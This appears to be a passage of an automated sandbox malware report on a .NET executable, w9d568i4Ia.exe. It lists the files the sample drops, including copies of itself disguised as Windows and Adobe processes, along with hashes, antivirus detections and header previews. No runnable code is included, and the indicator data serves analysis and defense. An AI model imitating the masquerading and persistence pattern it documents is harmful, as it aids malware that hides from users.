            Entropy (8bit):6.36855198388473
            Encrypted:false
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            MD5:2405CB014678984F0655CF9603C04ABD
            SHA1:8C85FE8A9AE968883AC7D3E2961CE764EEA9CFC1
            SHA-256:6A96C03F88BEA76297D2B820045E131470872901959B9130B4CA34B9B0C6A4F8
            SHA-512:812D10EC24D0EC869F91D3EB768C63B936F315A777EAF937E31081A13AB39C17C36884981A7322AC17667BE593D77466373850497387C6AB68AB6034006AAB3F
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.36855198388473
            Encrypted:false
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            MD5:2405CB014678984F0655CF9603C04ABD
            SHA1:8C85FE8A9AE968883AC7D3E2961CE764EEA9CFC1
            SHA-256:6A96C03F88BEA76297D2B820045E131470872901959B9130B4CA34B9B0C6A4F8
            SHA-512:812D10EC24D0EC869F91D3EB768C63B936F315A777EAF937E31081A13AB39C17C36884981A7322AC17667BE593D77466373850497387C6AB68AB6034006AAB3F
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Program Files (x86)\Microsoft SQL Server\110\Shared\24dbde2999530e

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):50
            Entropy (8bit):5.083856189774724
            Encrypted:false
            SSDEEP:3:nkQat4S9V+vnXjyjyc:nkp9CXC
            MD5:085C3188B3D8A4009475973326B94676
            SHA1:28F88DA3E253D9F63E73109AB7944F7900CEA24A
            SHA-256:98008B7C8BC37C99779C9D0EFD4214551ABD9F9C8418E9155FA55C6A42910BEA
            SHA-512:C25A66784C7DA8019E91080E28AF59E6DFC2666AA915F3F47B6BED0520818016DDDB92F10063765C1B4ABAA4F59FB9723720A09DF2584318D69CE16B170A09BF
            Malicious:false
            Preview:CcDIrI5u2oHTVSL1QkfPC90EBlmwJdtrLhVA70pwuIeoaIWBYh

            C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA6F0.tmp

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.368708680847586
            Encrypted:false
            SSDEEP:24576:2fee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:2GegmCGKWVL
            MD5:661190BE27D94E444640D2C3310BF159
            SHA1:B937C62CF5C954C75BCE697EFDDACADC4CE09CCA
            SHA-256:986147016C8ADA6E04BA64E8298A0B80051A56E3E4A87612C9A2C8F71C3A738C
            SHA-512:E6A15AF8B46694E950BB802BD2901B91891649E67B12BC862EA6291F1762EE1706A2273D9C8086D91AAE6AA8D5AF00A4B9D07497BE7C653BCD7EC75DA0283D4C
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA887.tmp

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.36855198388473
            Encrypted:false
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            MD5:2405CB014678984F0655CF9603C04ABD
            SHA1:8C85FE8A9AE968883AC7D3E2961CE764EEA9CFC1
            SHA-256:6A96C03F88BEA76297D2B820045E131470872901959B9130B4CA34B9B0C6A4F8
            SHA-512:812D10EC24D0EC869F91D3EB768C63B936F315A777EAF937E31081A13AB39C17C36884981A7322AC17667BE593D77466373850497387C6AB68AB6034006AAB3F
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.36855198388473
            Encrypted:false
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            MD5:2405CB014678984F0655CF9603C04ABD
            SHA1:8C85FE8A9AE968883AC7D3E2961CE764EEA9CFC1
            SHA-256:6A96C03F88BEA76297D2B820045E131470872901959B9130B4CA34B9B0C6A4F8
            SHA-512:812D10EC24D0EC869F91D3EB768C63B936F315A777EAF937E31081A13AB39C17C36884981A7322AC17667BE593D77466373850497387C6AB68AB6034006AAB3F
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe (copy)

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.368877505443787
            Encrypted:false
            SSDEEP:24576:2fee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:2GegmCGKWVL
            MD5:13A66808F50F022C7FFF8C24D0F0834F
            SHA1:BCAF459E6AA2531F66786AEBE0529DD1272CC018
            SHA-256:488C7A7BD3D99F18CE23113014407464FDABAE03DAEE6B1669EFBC1CFF32AA32
            SHA-512:9BCC5305138870BF90AC3282BAFFC63A48BA6318403F1A8828D9CFCBCBB9E3BAD099424397B626D0453151E278C7E0FA4827DFF06903FD0B68DA82A04758024E
            Malicious:false
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.......|............................................................................ ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc...|............H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe (copy)

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.368708680847586
            Encrypted:false
            SSDEEP:24576:2fee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:2GegmCGKWVL
            MD5:661190BE27D94E444640D2C3310BF159
            SHA1:B937C62CF5C954C75BCE697EFDDACADC4CE09CCA
            SHA-256:986147016C8ADA6E04BA64E8298A0B80051A56E3E4A87612C9A2C8F71C3A738C
            SHA-512:E6A15AF8B46694E950BB802BD2901B91891649E67B12BC862EA6291F1762EE1706A2273D9C8086D91AAE6AA8D5AF00A4B9D07497BE7C653BCD7EC75DA0283D4C
            Malicious:false
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\windows nt\RCXABD4.tmp

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.368897582109863
            Encrypted:false
            SSDEEP:24576:mfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:mGegmCGKWVL
            MD5:F40E37F39553D5694693F8F5B75A017A
            SHA1:F381B4F9DB9B12ED8C9E7DD35D4D818DDAA7EFCC
            SHA-256:2C8FE8AFE1803AE5FB9900C4CE175924B7B554E77FFF53CD04A6B72D7B4CC306
            SHA-512:B624142664D70096A1D02F031A7C2BDF1F8FCD554B5AE685DA277419AA98D1075E15FC7092D3D05C9C28EA9710F6A336EAD9F5B7CC01F1B8A39BE8C32CA078D5
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.......x............................................................................ ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc...x............H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\windows nt\RCXAE26.tmp

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.36855198388473
            Encrypted:false
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            MD5:2405CB014678984F0655CF9603C04ABD
            SHA1:8C85FE8A9AE968883AC7D3E2961CE764EEA9CFC1
            SHA-256:6A96C03F88BEA76297D2B820045E131470872901959B9130B4CA34B9B0C6A4F8
            SHA-512:812D10EC24D0EC869F91D3EB768C63B936F315A777EAF937E31081A13AB39C17C36884981A7322AC17667BE593D77466373850497387C6AB68AB6034006AAB3F
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\windows nt\backgroundTaskHost.exe

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.36855198388473
            Encrypted:false
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            MD5:2405CB014678984F0655CF9603C04ABD
            SHA1:8C85FE8A9AE968883AC7D3E2961CE764EEA9CFC1
            SHA-256:6A96C03F88BEA76297D2B820045E131470872901959B9130B4CA34B9B0C6A4F8
            SHA-512:812D10EC24D0EC869F91D3EB768C63B936F315A777EAF937E31081A13AB39C17C36884981A7322AC17667BE593D77466373850497387C6AB68AB6034006AAB3F
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\windows nt\backgroundTaskHost.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Program Files (x86)\windows nt\eddb19405b7ce1

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:ASCII text, with very long lines, with no line terminators
            Category:dropped
            Size (bytes):952
            Entropy (8bit):5.910606724017968
            Encrypted:false
            SSDEEP:24:gRaKjx7lIz9KldKXEEiuimsl8CcUt3UXzvJF8OPHfUSae3Z9j:7KhlI4lYhimsmDUEzvPBPHfUgX
            MD5:DB4782C50D826C5596DC3ED40F4EB7F3
            SHA1:91B55D589C6FB09CEEFC44CBC5CA4BEDA0A5791A
            SHA-256:8EF8352160BD41CE14D268EE1A13BD616581C9594772A7C4C1AF54334CB4D2EE
            SHA-512:C4C81130EED8114F42DF6DD68DA8C2483A3002A4FEB24ED3C25648C9BE907F813C691653D1FEC0632B669AB5B4C2DBE6C660C6A528AB507AB39402DF344C2981
            Malicious:false
            Preview:L4Z4te3fMn3PlXlK2DtgSY7tjQlgGuBAhENm3657GiZWN04v9NCWYSow6pUc3WYbm2rhJ9Q5IwZt8lgtW0h2romPZbqNmcDtJ7tVJXlA7HNm24xUJlFDzgu7QbHsSCSpsqkB2Lk9Og5jbAXenVEAXA3nNwFrP2r4yi3LUwc8BFyTlLgPEnE78SSrw7xFG2uVyAu2GLJ12F9RLkCCQznlyu5gQLZX8X2IVdekanJ2dNE2TAgL5vzQPIhEEOm5vw3fN05sGblnqvIlqDMPpOcMhl3N6ZfMAOGqUipdExEdJMke96YBBXPhUq7l6swr6ZmcobRHYtK2J9DVAZNABdKn8jWnkDgWBXgujIzipQnRMXXVnmkhfwpdO8dFFnhUNy0wdSw2jpUuz3blLBA8c90OrCflpucBtSDYgk1U0s70b4nVh23Dmi2O7mEaxKMzMTBgzDElJqItCAxxZJDw1ZZKaza4gbgpfIoI3GgexS46aIL6yRAnGa7w40G9mKErJdN3Wp3Snj9jecuSndFPb2iFK1NDAg1nNMw74SkJXrAgaXSbFxVJFzQQ4Hteb0SGsVWSpxXV251t2Bowjw7MLsiX6gCwiFshY3yFB9vSa9QJ7gY2d65o2G5Ax8VJukxxMUU8NjvjApvLcYaZHKTmKDoS8xRDomi0Mc6nLap3LWoNUtiYi6CkQKnIpB9ZSr5YH599bwNqeabxZb8OP2fsj7jCzy8KaPldbQGZuj7wsVF0tztODvKZMNyJV7JnxDQPz7WJUieq5t9O1tSAEuGpELROb6DxZT8oE0Bvcj3eQeecNkRmoIjD7lKnpIrXfrQluUJBsgie0lYkryA1pbIQu5rdpXGT2f9jO2s2aQ3HkEMWMk51H0sEi91znqWUaOmVlzVzGIbZhAqqtUQEbPLBx5BOB2Ou3irWb0uXPGu9ZTghTKFSZR3LCkiqxHyN

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log

            Download File
            Process:C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.367899416177239
            Encrypted:false
            SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
            MD5:7115A3215A4C22EF20AB9AF4160EE8F5
            SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
            SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
            SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\backgroundTaskHost.exe.log

            Download File
            Process:C:\Program Files (x86)\windows nt\backgroundTaskHost.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.367899416177239
            Encrypted:false
            SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
            MD5:7115A3215A4C22EF20AB9AF4160EE8F5
            SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
            SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
            SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost.exe.log

            Download File
            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.367899416177239
            Encrypted:false
            SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
            MD5:7115A3215A4C22EF20AB9AF4160EE8F5
            SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
            SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
            SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\vLhkFRJoasJvKPEeUEtn.exe.log

            Download File
            Process:C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.367899416177239
            Encrypted:false
            SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
            MD5:7115A3215A4C22EF20AB9AF4160EE8F5
            SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
            SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
            SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\w9d568i4Ia.exe.log

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):1740
            Entropy (8bit):5.360872475306136
            Encrypted:false
            SSDEEP:48:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1hAHKKP5H+RHKl:iqnwmI0qerYqGgAoPtzG1eqKP5gql
            MD5:7AC9E3ED5E1926DAE60D44553AFE67FE
            SHA1:1EC2BB13633A3C21E2F3206696D89876B15E160F
            SHA-256:97BCE2B4536F07A3269FCCA71C9768C9D516D065BE0E538B17BADB90C32A6554
            SHA-512:D8070849646B1E8967C713800098073E68B0FF5EAB55E06A32E0C365A6D49E5FB1718340459B4710B4A8DC6CDE8EA1345F7935CD0C7E27A18BEF71B8309A5B27
            Malicious:true
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Temp\Fssxa4WCX6

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):25
            Entropy (8bit):4.243856189774724
            Encrypted:false
            SSDEEP:3:Y2RB/bYztTc:LAQ
            MD5:3A71EB560C090D084DB35737773DA22D
            SHA1:3C51C15A6DC16575DCB80E9F773A2984B8F8EBAC
            SHA-256:30578DA74C52E1CEEB87B371C366108102077411A04DF5B1739324F3F1CB2D6C
            SHA-512:E0F03B135E46E2E9797FB4DCFC889B77EE8F0A62783D14B7ABA9F5F5502737A836A57B84E0547C11D7D6E5F5D77F2FCC09AF959003983303BED361E59EBAC5D5
            Malicious:false
            Preview:So1XZtStdZflPnBM5vMbUcHv9

            C:\Users\user\AppData\Local\Temp\lJjcBPjH5n.bat

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:DOS batch file, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):202
            Entropy (8bit):5.14671126897796
